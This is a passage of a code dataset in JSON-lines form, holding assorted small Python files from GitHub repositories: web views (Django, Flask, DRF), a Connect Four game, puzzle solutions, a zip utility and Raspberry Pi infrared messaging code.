check_expected_blob_size(\"float3\", 2, 4)\n\n # Our serialization options request to split float1 into 500-element\n # chunks when saving it. 
If fbgemm is available then the float1 blob\n # will be serialized using 2 bytes per element instead of 4 bytes.\n float1_num_chunks = 4000 // 500\n if workspace.has_fbgemm:\n check_expected_blob_size(\"float1\", 4000, 2, float1_num_chunks)\n else:\n check_expected_blob_size(\"float1\", 4000, 4, float1_num_chunks)\n\n check_expected_blob_size(\"blob_names\", len(expected_blobs), 50)\n check_expected_blob_size(\"blob_sizes\", len(expected_blobs), 8)\n\n # Now actually save the blobs so we can compare our estimates\n # to how big the serialized data actually is.\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n save_op = core.CreateOperator(\n \"Save\",\n list(sizes_by_name.keys()),\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n options=options,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n saved_sizes: Dict[str, int] = {}\n for blob_name, chunks in blob_chunks.items():\n total_size = sum(chunk.value_size for chunk in chunks)\n saved_sizes[blob_name] = total_size\n\n # For sanity checking, ensure that our estimates aren't\n # extremely far off\n for name in expected_blobs:\n estimated_size = sizes_by_name[name]\n saved_size = saved_sizes[name]\n difference = abs(estimated_size - saved_size)\n error_pct = 100.0 * (difference / saved_size)\n print(\n f\"{name}: estimated={estimated_size} actual={saved_size} \"\n f\"error={error_pct:.2f}%\"\n )\n # Don't check the blob_names blob. It is a string tensor, and we\n # can't estimate string tensor sizes very well without knowing the\n # individual string lengths. (Currently it requires 102 bytes to\n # save, but we estimate 360).\n if name == \"blob_names\":\n continue\n # Check that we are within 100 bytes, or within 25%\n # We are generally quite close for tensors with fixed-width fields\n # (like float), but a little farther off for tensors that use varint\n # encoding.\n if difference > 100:\n self.assertLess(error_pct, 25.0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/load_save_test.py","file_name":"load_save_test.py","file_ext":"py","file_size_in_byte":33210,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"}
{"seq_id":"3580082648","text":"# Generic view to display results\nfrom django.views.generic.base import TemplateView\n# Workbook lets us create Excel workbooks\nfrom openpyxl import Workbook\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color,Fill,PatternFill\nfrom openpyxl.cell import Cell\nfrom openpyxl.worksheet.properties import WorksheetProperties, PageSetupProperties\n# Gives us back a result object, in this case an Excel file\n\nfrom django.http.response import HttpResponse\nfrom .models import *\nfrom django.db.models import Sum, Count\nfrom django.utils import timezone\nimport datetime\nfrom django.db import connection\nimport pytz # so we can sum the fields\nfrom django.db.models import Q # so we can use the | operator, which works like OR\nfrom django.db.models import F\n\ndef ValuesQuerySetToDict(vqs):\n return [item for item in vqs]\n\ndef to_dict(instance):\n opts = instance._meta\n data = {}\n for f in opts.concrete_fields + opts.many_to_many:\n if isinstance(f, ManyToManyField):\n if instance.pk is None:\n data[f.name] = []\n 
else:\n data[f.name] = f.value_from_object(instance)\n return data\n\n# Our class inherits from the generic TemplateView\n\nclass ReporteCliente(TemplateView):\n\n def get(self, request, *args, **kwargs):\n # read the request parameters\n fechaini = self.request.GET.get('fechainicial_precio')\n fechafini = self.request.GET.get('fechafinal_precio')\n cliente = self.request.GET.get('cliente_idcliente')\n checo=str(self.request.GET.get('checkbo'))\n\n if not cliente:\n cliente=0\n\n truncate_date = connection.ops.date_trunc_sql('month', 'fecha_venta') # extract only the month of the sale\n qs = Venta.objects.extra({'month':truncate_date}) # adds a new field/column named \"month\" whose data is \"truncate_date\", i.e. the month in this case\n fecha1=str(fechaini) # must be the earlier date\n fecha2=str(fechafini) # must be the later date\n fecha1_split=fecha1.split('/')\n fecha2_split=fecha2.split('/')\n\n compras_clientes=qs.values('month','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') # this one also works with the hours\n pormes=False\n if len(fecha1_split)>1 and len(fecha2_split)>1:\n #fecha1_split=fecha1.split('/')\n #fecha2_split=fecha2.split('/')\n fechainicial_real=datetime.datetime(int(fecha1_split[2]),int(fecha1_split[1]), int(fecha1_split[0]),0,0,0,tzinfo=pytz.UTC)\n fechafinal_real=datetime.datetime(int(fecha2_split[2]),int(fecha2_split[1]), int(fecha2_split[0]),23,59,59,tzinfo=pytz.UTC)\n fechainicial_real=fechainicial_real+datetime.timedelta(hours=6)\n fechafinal_real=fechafinal_real+datetime.timedelta(hours=6)\n if checo==\"true\":\n pormes=True\n compras_clientes = qs.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,cliente_idcliente=int(cliente),fecha_venta__range=(fechainicial_real, fechafinal_real)).values('month','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') # this one also works with the hours\n if not compras_clientes:\n compras_clientes= qs.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,fecha_venta__range=(fechainicial_real, fechafinal_real)).values('month','cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') # this one also works with the hours\n else:\n compras_clientes = Venta.objects.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,cliente_idcliente=int(cliente),fecha_venta__range=(fechainicial_real, fechafinal_real)).values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('total_ventas')\n if not compras_clientes:\n compras_clientes = Venta.objects.filter(entregada_venta=1,es_cotizacion=0,estado_venta=1,fecha_venta__range=(fechainicial_real, fechafinal_real)).values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('total_ventas')\n\n if not 
compras_clientes:\n compras_clientes=qs.values('cliente_idcliente__nit_cliente','cliente_idcliente__pk','month','cliente_idcliente__persona_idpersona__nombres_persona','cliente_idcliente__persona_idpersona__apellidos_persona').annotate(total_ventas=Sum('total_venta')).order_by('month') # this one also works with the hours\n\n repo_clientes=ValuesQuerySetToDict(compras_clientes)\n\n # Create the workbook\n wb = Workbook()\n # Use the active sheet (by default the first in the workbook) as our worksheet\n ws = wb.active\n # Put the report header text in cells B1-B3\n ws['B1'] = 'Kadosh'\n ws['B2'] = 'REPORTE DE PRODUCTOS'\n ws['B3'] = datetime.datetime.now()\n\n # Merge the cells from B1 through E1 into a single cell\n ws.merge_cells('B1:E1')\n ws.merge_cells('B2:E2')\n ws.merge_cells('B3:E3')\n # Cell font colors and letter sizes\n ft = Font(color=colors.RED)\n b1 = ws['B1']\n b1.font = ft\n ft2 = Font(color=colors.BLUE)\n b2 = ws['B2']\n b2.font = ft2\n\n # Create the column headers, cells B5 through G5\n ws['B5'] = 'Cod'\n ws['C5'] = 'Nit'\n ws['D5'] = 'Nombres'\n ws['E5'] = 'Apellidos'\n ws['F5'] = 'Mes'\n ws['G5'] = 'Compra'\n\n\n cont=6\n # Iterate over the client set, writing each value into the cells\n for client in repo_clientes:\n if pormes:\n fecha=client['month'].month #strftime('%B')\n ws.cell(row=cont,column=6).value = fecha\n ws.cell(row=cont,column=2).value = client['cliente_idcliente__pk']\n ws.cell(row=cont,column=3).value = client['cliente_idcliente__nit_cliente']\n ws.cell(row=cont,column=4).value = client['cliente_idcliente__persona_idpersona__nombres_persona']\n ws.cell(row=cont,column=5).value = client['cliente_idcliente__persona_idpersona__apellidos_persona']\n ws.cell(row=cont,column=7).value = client['total_ventas']\n\n cont = cont + 1\n\n # Set the file name\n nombre_archivo =\"ReporteClientes.xlsx\"\n # Declare that the response to return is a Microsoft Excel file\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n","repo_name":"masozow/kadosh","sub_path":"kadoshapp/viewReporteClientesExcel.py","file_name":"viewReporteClientesExcel.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"38140024250","text":"from enum import Enum, auto\n\n\nclass InvalidMove(Exception):\n pass\n\n\nclass GameStates(Enum):\n OPEN = auto()\n DRAW = auto()\n PLAYER_1_WIN = auto()\n PLAYER_2_WIN = auto()\n\n\nclass ConnectFourGame:\n def __init__(self, x_size, y_size, player_1='player_1', player_2='player_2'):\n if x_size <= 0 or y_size <= 0:\n raise ValueError('x_size and y_size should be a positive integer')\n self._move_history = []\n self._board = [[] for _ in range(x_size)]\n self._player_names = [player_1, player_2]\n self._x_size = x_size\n self._y_size = y_size\n self._game_state = GameStates.OPEN\n self._winning_row = None\n\n def move(self, x_coord, player=None):\n if player is not None and self.current_player() != player:\n raise InvalidMove(f'Not {player}\\'s turn.')\n if self._game_state != GameStates.OPEN:\n raise InvalidMove('Game already closed.')\n if x_coord < 0 or x_coord >= self._x_size:\n raise InvalidMove(f'Invalid x coordinate: {x_coord}.')\n if len(self._board[x_coord]) >= self._y_size:\n 
\n            raise InvalidMove(f'Column is full: {x_coord}.')\n\n        self._move(x_coord)\n\n    def current_player(self):\n        return self._player_names[self._current_player()]\n\n    def last_player(self):\n        return self._player_names[1 - self._current_player()]\n\n    def get_board(self):\n        result = [[None] * self._y_size for _ in range(self._x_size)]\n        for x_coord, column in enumerate(self._board):\n            for y_coord, occupied_by in enumerate(column):\n                result[x_coord][y_coord] = occupied_by\n        return result\n\n    def occupied_by(self, x_coord, y_coord):\n        player = self._occupied_by(x_coord, y_coord)\n        if player is None:\n            return None\n        return self._player_names[player]\n\n    def undo(self, player=None):\n        if len(self._move_history) == 0:\n            raise InvalidMove('No move to undo.')\n        if self._game_state != GameStates.OPEN:\n            raise InvalidMove('Game already closed.')\n        if player is not None and self.last_player() != player:\n            raise InvalidMove(f'It is {player}\\'s turn. Undo is not allowed.')\n\n        x_coord = self._move_history.pop()\n        self._board[x_coord].pop()\n\n    def get_state(self):\n        return self._game_state\n\n    def get_winning_row(self):\n        return self._winning_row\n\n    def _move(self, x_coord):\n        player = self._current_player()\n        new_position = (x_coord, len(self._board[x_coord]))\n\n        self._move_history.append(x_coord)\n        self._board[x_coord].append(player)\n        directions = ((-1, 1), (0, 1), (1, 1), (1, 0))\n        for direction in directions:\n            row = set()\n            for step in (direction, tuple(-coord for coord in direction)):\n                position = new_position\n                while self._occupied_by(*position) == player:\n                    row.add(position)\n                    position = tuple(pos_coord + step_coord\n                                     for pos_coord, step_coord in zip(position, step))\n            if len(row) >= 4:\n                if player == 0:\n                    self._game_state = GameStates.PLAYER_1_WIN\n                else:\n                    self._game_state = GameStates.PLAYER_2_WIN\n                self._winning_row = sorted(row)\n                break\n        if (self._game_state == GameStates.OPEN and\n                len(self._move_history) == self._x_size * self._y_size):\n            self._game_state = GameStates.DRAW\n\n    def _current_player(self):\n        return len(self._move_history) % 2\n\n    def _occupied_by(self, x_coord, y_coord):\n        if x_coord < 0 or x_coord >= self._x_size:\n            return None\n        if y_coord < 0 or y_coord >= len(self._board[x_coord]):\n            return None\n        return self._board[x_coord][y_coord]\n","repo_name":"r7ar7a/connect_four","sub_path":"connect_four/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3405590324","text":"from flask import Flask,render_template,abort,request\napp= Flask(__name__)\n\nimport json\nwith open("MSX.json") as fichero:\n    datos=json.load(fichero)\n\n\n@app.route('/',methods=["GET"])\ndef inicio():\n    return render_template("inicio.html")\n\n@app.route('/juegos',methods=["GET"])\ndef juegos():\n    return render_template("buscajuegos.html")\n\n@app.route('/listajuegos',methods=["POST"])\ndef listajuegos():\n    nombre=request.form["cadena"]\n    lista_juegos=[]\n    for dato in datos:\n        if nombre in str(dato["nombre"]):\n            lista_juegos.append(dato)\n    return render_template("listajuegos.html",datos=lista_juegos,nombre=nombre)\n\n@app.route('/juego/<id>')\ndef juego(id):\n    juego=[]\n    for dato in datos:\n        if id == str(dato["id"]):\n            juego.append(dato)\n            return render_template("juego.html",datos=juego)\n    return abort(404)\n
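# Illustrative request (the id value is hypothetical): GET /juego/3 renders\n# juego.html for the entry whose "id" field is 3; any other id falls through\n# to abort(404).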
\n\napp.run(debug=True)","repo_name":"MiguelAsir2/JuegosMSX","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"40438774689","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-02 11:13:13\n# @Last Modified time: 2016-10-02 11:16:51\n# @FileName: 53.py\n\n\nclass Solution(object):\n    def maxSubArray(self, nums):\n        """\n        :type nums: List[int]\n        :rtype: int\n        """\n        max_ = nums[0]\n        sum_ = 0 \n        for i in range(len(nums)): \n            if sum_ < 0:\n                sum_ = nums[i]\n            else:\n                sum_ = sum_ + nums[i]\n            max_ = max(sum_, max_)\n        return max_\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20308603541","text":"from flask import Blueprint, redirect, render_template, request\nfrom utilities.db.products import Product\n\n# catalog blueprint definition\ncatalog = Blueprint('catalog', __name__, static_folder='static',\n                    static_url_path='/catalog', template_folder='templates')\n\n\n# Routes\n@catalog.route('/catalog')\ndef index():\n    cookies = Product.get_cookies()\n    packs = Product.get_packs()\n    return render_template('catalog.html', cookies=cookies, packs=packs)\n\n\n@catalog.route('/type')\ndef fillter_type():\n    packs = Product.get_packs()\n    singles = Product.get_cookies()\n    type = request.args.get('type')\n    if type == 'pack':\n        return render_template('catalog.html', cookies=[], packs=packs)\n    else:\n        return render_template('catalog.html', cookies=singles, packs=[])\n\n\n@catalog.route('/base')\ndef fillter_base():\n    selected_base = request.args.get('base')\n    print(selected_base)\n    cookies = Product.get_cookies_by_base(selected_base)\n    return render_template('catalog.html', cookies = cookies, packs = [])\n\n","repo_name":"GititHania/web-project-g22","sub_path":"pages/catalog/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70974269033","text":"import zipfile\nimport os\n\n\n# zip the file in path folder with name filename\ndef zip_file(filename, path):\n    f = zipfile.ZipFile(filename, 'w')\n    write_zip(f, path)\n    f.close()\n\n\n# recursively write the folder contents to zip_file\ndef write_zip(zip_file, path):\n    for file in os.listdir(path):\n        if os.path.isdir(os.path.join(path, file)):\n            zip_file.write(os.path.join(path, file))\n            write_zip(zip_file, os.path.join(path, file))\n        else:\n            zip_file.write(os.path.join(path, file))\n\nif __name__ == '__main__':\n    filename = 'c:/users/silcata/desktop/myzip.zip'\n    folder = 'c:/users/silcata/desktop/python'\n    zip_file(filename, folder)\n","repo_name":"ofedge/python-demo","sub_path":"tools/zip_file.py","file_name":"zip_file.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"3345990687","text":""""\r\nTransition: if dp[i-1] <= 0, then dp[i-1] contributes negatively to dp[i], i.e. dp[i-1] + nums[i] is no larger than nums[i] itself.\r\n\r\nWhen dp[i-1] > 0: set dp[i] = dp[i-1] + nums[i];\r\nWhen dp[i-1] <= 0: set dp[i] = nums[i];\r\n"""\r\nclass Solution:\r\n    def maxSubArray(self, nums):\r\n        n = len(nums)\r\n        dp = [0 for i in range(n)]\r\n        dp[0] = nums[0]\r\n        for i in range(1, n):\r\n            dp[i] = max(nums[i], dp[i-1] + 
nums[i])\r\n        print(dp)\r\n        return max(dp)","repo_name":"Hegemony/Python-Practice","sub_path":"剑指 Offer/42. maxSubArray.py","file_name":"42. maxSubArray.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4580428997","text":"BLOCKS = [\n    [0, 1, 2, 3],\n    [1j, 1, 1 + 1j, 1 + 2j, 2 + 1j],\n    [0, 1, 2, 2 + 1j, 2 + 2j],\n    [0, 1j, 2j, 3j],\n    [0, 1j, 1, 1 + 1j],\n]\n\n\ndef debug(occupied):\n    max_y = int(max(c.imag for c in occupied))\n    for y in range(max_y, -1, -1):\n        for x in range(7):\n            print(\"#\" if x + 1j * y in occupied else \".\", end=\"\")\n        print()\n\n\ndef can_slide(offset, block, occupied, x, y):\n    if not all(0 <= int(round(b.real)) + x + offset < 7 for b in block):\n        return False\n    for c in occupied:\n        if abs(block[0] + x + y * 1j - c) > 5:\n            continue\n        for b in block:\n            if c == b + x + y * 1j + offset:\n                return False\n    return True\n\n\ndef can_fall(block, occupied, x, y):\n    for c in occupied:\n        if abs(block[0] + x + y * 1j - c) > 5:\n            continue\n        for b in block:\n            if c == b + x + y * 1j - 1j:\n                return False\n    return True\n\n\ndef compute_key_first_block(nb_instructions, step, occupied):\n    return (\n        step % nb_instructions,\n        tuple(sorted(occupied, key=lambda c: (c.imag, c.real), reverse=True)),\n    )\n\n\ndef fall(instructions, i, step, occupied):\n    max_y = int(max(c.imag for c in occupied))\n    y = max_y + 4\n    x = 2\n    block = BLOCKS[i % 5]\n    while True:\n        offset = 1 if instructions[step % len(instructions)] == \">\" else -1\n        step += 1\n        if can_slide(offset, block, occupied, x, y):\n            x += offset\n        if can_fall(block, occupied, x, y):\n            y -= 1\n        else:\n            for b in block:\n                occupied.add(b + x + y * 1j)\n            return occupied, step\n\n\ndef part_1(input_data):\n    instructions = next(input_data)\n    occupied = {0, 1, 2, 3, 4, 5, 6}\n    step = 0\n    for i in range(2022):\n        occupied, step = fall(instructions, i, step, occupied)\n        max_y = int(max(c.imag for c in occupied))\n        to_remove = set()\n        for c in occupied:\n            if abs(c - max_y * 1j) > 40:\n                to_remove.add(c)\n        occupied -= to_remove\n    return int(max(c.imag for c in occupied))\n\n\ndef part_2(input_data):\n    nb_blocks = 1000000000000\n    instructions = next(input_data)\n    occupied = {0, 1, 2, 3, 4, 5, 6}\n    step = 0\n    cache = {}\n    y_offset = 0\n    i = 0\n    while i < nb_blocks:\n        if i % 100 == 0:\n            print(i)\n        occupied, step = fall(instructions, i, step, occupied)\n\n        if i % 5 > 0:\n            i += 1\n            continue\n\n        max_y = int(max(c.imag for c in occupied))\n        if max_y > 200:\n            occupied = {\n                c - (max_y - 200) * 1j for c in occupied if abs(max_y - c.imag) <= 200\n            }\n            y_offset += max_y - 200\n\n        key = compute_key_first_block(len(instructions), step, occupied)\n        if key in cache:\n            cycle_len = i - cache[key][\"i\"]\n            full_cycles_remaining = (nb_blocks - i) // cycle_len\n            delta_y = max_y + y_offset - cache[key][\"max_y\"]\n            i += cycle_len * full_cycles_remaining\n            y_offset += delta_y * full_cycles_remaining\n\n        cache[key] = {\"max_y\": max_y + y_offset, \"i\": i}\n        i += 1\n\n    return int(max(c.imag for c in occupied)) + y_offset\n","repo_name":"mgesbert/advent","sub_path":"src/2022/algo/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3725159546","text":"def genSubsets(L):\n    """\n    Input: list -> list of lists\n    produces a new list containing every subset (the power set) of the elements in L\n    """\n    res = []\n    if len(L) == 0:\n        return [[]] # list of empty lists\n    smaller = 
genSubsets(L[:-1]) # all subsets without the last element\n extra = L[-1:] # creates a list of just last element\n new = []\n for small in smaller:\n new.append(small+extra)\n \n return smaller+new\n\n#Test\nprint(genSubsets([0,1,2,3]))","repo_name":"iamieht/MITx-6.00.1x","sub_path":"Week6/genSubsets.py","file_name":"genSubsets.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32790305576","text":"import time, queue, sys\nfrom threading import Thread\n\nimport gpiozero\n\n\ndef serialize_message(message):\n return [ord(character) for character in message]\n\n\ndef deserialize_message(ascii_list):\n return \"\".join([chr(num) for num in ascii_list])\n\n\nclass Buffer:\n def __init__(self, size):\n self.size = size\n self.buffer = []\n\n def put(self, item):\n self.buffer.append(item)\n if len(self.buffer) > self.size:\n self.buffer.pop(0)\n\n def value(self):\n current_len = len(self.buffer)\n if current_len == 0:\n return 0\n return sum(self.buffer)/current_len\n\n def length(self):\n return len(self.buffer)\n\n def empty(self):\n self.buffer = []\n\n\nclass IR_Sensor:\n on_threshold = 0.05\n off_threshold = 0.02\n\n def __init__(self, pin_num):\n self.pin_num = pin_num\n self.sensor = gpiozero.InputDevice(pin_num)\n self.raw_q = queue.SimpleQueue()\n self._stop = False\n\n def start(self):\n stop_fn = lambda: self._stop\n self.io_thread = Thread(target=self._stream_input, args=(stop_fn,))\n self.convert_thread = Thread(target=self._convert_input, args=(stop_fn,))\n self.io_thread.start()\n self.convert_thread.start()\n\n def _convert_input(self, stop):\n raw_buffer = Buffer(50)\n value_buffer = Buffer(1000)\n previous_value = 0\n off_iter = 0\n while True:\n if stop():\n break\n raw_value = self.raw_q.get()\n raw_buffer.put(raw_value)\n value = raw_buffer.value()\n if value <= self.off_threshold:\n previous_value = 0\n off_iter += 1\n elif value >= self.on_threshold:\n if previous_value == 0:\n value_buffer.put(1)\n off_iter = 0\n previous_value = 1\n\n if off_iter >= 4000:\n ascii_code = sum(value_buffer.buffer)\n if ascii_code == 0:\n continue\n # print(ascii_code)\n print(deserialize_message([ascii_code]), end='')\n sys.stdout.flush()\n value_buffer.empty()\n off_iter = 0\n\n\n def _stream_input(self, stop):\n while True:\n if stop():\n break\n raw_value = self.sensor.value\n if raw_value == 0:\n value = 1\n else:\n value = 0\n self.raw_q.put(value)\n time.sleep(0.00000001)\n\n def stop(self):\n self._stop = True\n self.convert_thread.join()\n self.io_thread.join()\n self._stop = False\n\n def get(self):\n return self.q.get()\n\n\nclass IR_LED:\n def __init__(self, pin_num):\n self.pin_num = pin_num\n self.LED = gpiozero.LED(pin_num)\n self.LED.off()\n self.blink_interval = 0.0044\n\n def blink(self, n):\n for i in range(n):\n self.LED.on()\n time.sleep(self.blink_interval)\n self.LED.off()\n time.sleep(self.blink_interval*1.2)\n\n def off(self):\n self.LED.off()\n\n def on(self):\n self.LED.on()\n\n def send_msg(self, msg):\n encoded_msg = serialize_message(msg)\n for code in encoded_msg:\n print(f\"sending ascii code: {code}\")\n self.blink(n=code)\n time.sleep(self.blink_interval*150)\n","repo_name":"mauza/rpi-ir-messages-tutorial","sub_path":"src/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27005264298","text":"from datetime import 
datetime\n\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiExample, OpenApiParameter, extend_schema\nfrom rest_framework.decorators import action\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom dunder_mifflin.core.controller.sale import SaleController\nfrom dunder_mifflin.core.infra.repository.commission_limit import CommissionLimitRepository\nfrom dunder_mifflin.core.infra.repository.sale import SaleRepository\nfrom dunder_mifflin.core.infra.serializers.sale import SaleReadSerializer, SaleWriteSerializer\n\nSALE_EXAMPLE = {\n \"id\": 1,\n \"nfe\": \"123-456-789-1011-1245\",\n \"client\": {\"id\": 1, \"name\": \"Foo\", \"email\": \"foo@bar.com\", \"phone\": \"1234567890\"},\n \"seller\": {\"id\": 1, \"name\": \"Foo\", \"email\": \"foo@bar.com\", \"phone\": \"1234567890\"},\n \"items\": [\n {\n \"id\": 1,\n \"product\": {\n \"id\": 1,\n \"code\": \"Foo\",\n \"description\": \"Foo bar\",\n \"price\": \"10.00\",\n \"commission_percent\": \"10.00\",\n },\n \"quantity\": 10,\n \"created_at\": \"2000-10-31T01:30:00.000-05:00\",\n \"updated_at\": \"2000-10-31T01:30:00.000-05:00\",\n },\n ],\n}\n\n\nclass SaleView(ViewSet):\n repo = SaleRepository()\n commission_repo = CommissionLimitRepository()\n read_serializer = SaleReadSerializer()\n write_serializer = SaleWriteSerializer()\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Listagem de todas as vendas feitas\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def list(self, _: Request):\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n ).list()\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Recuperacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def retrieve(self, _: Request, pk: int):\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n ).retrieve(pk)\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={204: None},\n description=\"Remocao pelo id de uma venda cadastrada\",\n )\n def delete(self, _: Request, pk: int):\n data, status = SaleController(self.repo).delete(pk)\n return Response(data=data, status=status)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Recuperacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def create(self, request: Request):\n try:\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n self.write_serializer,\n ).create(request.data)\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n\n @extend_schema(\n responses={200: SaleReadSerializer},\n description=\"Atualizacao pelo id de uma venda cadastrada\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=SALE_EXAMPLE,\n )\n ],\n )\n def update(self, request: Request, pk: int):\n try:\n data, status = SaleController(\n self.repo,\n self.read_serializer,\n self.write_serializer,\n ).update(request.data, pk)\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n\n @extend_schema(\n parameters=[\n OpenApiParameter(\"from\", OpenApiTypes.DATE, examples=[OpenApiExample(\"Exemplo\", value=\"dd/mm/yyyy\")]),\n 
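# (note) both date bounds are parsed in commissions() below with\n            # datetime.strptime(value, "%d/%m/%Y"), matching the dd/mm/yyyy examples\n            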
OpenApiParameter(\"to\", OpenApiTypes.DATE, examples=[OpenApiExample(\"Exemplo\", value=\"dd/mm/yyyy\")]),\n ],\n responses={200: SaleReadSerializer},\n description=\"Comissao total das vendas de um periodo\",\n examples=[\n OpenApiExample(\n \"Exemplo\",\n value=[\n {\n \"id\": 1,\n \"seller\": \"Foo Bar\",\n \"total_commission\": 1_200_000,\n \"total_quantity\": 100,\n }\n ],\n )\n ],\n )\n @action(methods=[\"GET\"], detail=False)\n def commissions(self, request: Request):\n try:\n start_date = datetime.strptime(\n request.query_params[\"from\"],\n \"%d/%m/%Y\",\n )\n end_date = datetime.strptime(\n request.query_params[\"to\"],\n \"%d/%m/%Y\",\n )\n\n data, status = SaleController(self.repo, commission_repo=self.commission_repo).get_commissions(\n start_date, end_date\n )\n return Response(data=data, status=status)\n except Exception as e:\n return Response(data={\"error\": str(e)}, status=400)\n","repo_name":"devguerreiro/bc-amcom","sub_path":"dunder_mifflin/core/infra/views/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4425818562","text":"import sys\nimport random\n\nfrom PyQt5.QtGui import QPainter, QColor\nfrom PyQt5.QtWidgets import QWidget, QApplication, QPushButton\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(200, 200, 600, 600)\n self.btn = QPushButton('Рисовать', self)\n self.btn.move(10, 10)\n self.btn.clicked.connect(self.paint)\n self.do_paint = False\n\n def paintEvent(self, event):\n if self.do_paint:\n self.btn.hide()\n qp = QPainter()\n qp.begin(self)\n self.draw_flag(qp)\n qp.end()\n\n def paint(self):\n self.do_paint = True\n self.repaint()\n\n def draw_flag(self, qp):\n qp.setBrush(QColor(255, 255, 0))\n for i in range(random.randint(3, 6)):\n x = random.randint(0, 200)\n y = random.randint(100, 300)\n d = random.randint(10, 100)\n x1 = x + d\n y1 = x + d\n qp.drawEllipse(x, y, x1, y1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n ex.show()\n sys.exit(app.exec())","repo_name":"arslan384github/task1","sub_path":"MyCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70148373034","text":"from common_crawl.base import *\nfrom openvenues.extract.soup import *\nfrom openvenues.extract.util import *\n\nlogger = logging.getLogger('microdata_job')\n\npatterns = [\n 'vcard',\n 'itemtype',\n 'typeof',\n 'maps\\.google',\n 'google\\.[^/]+\\/maps',\n 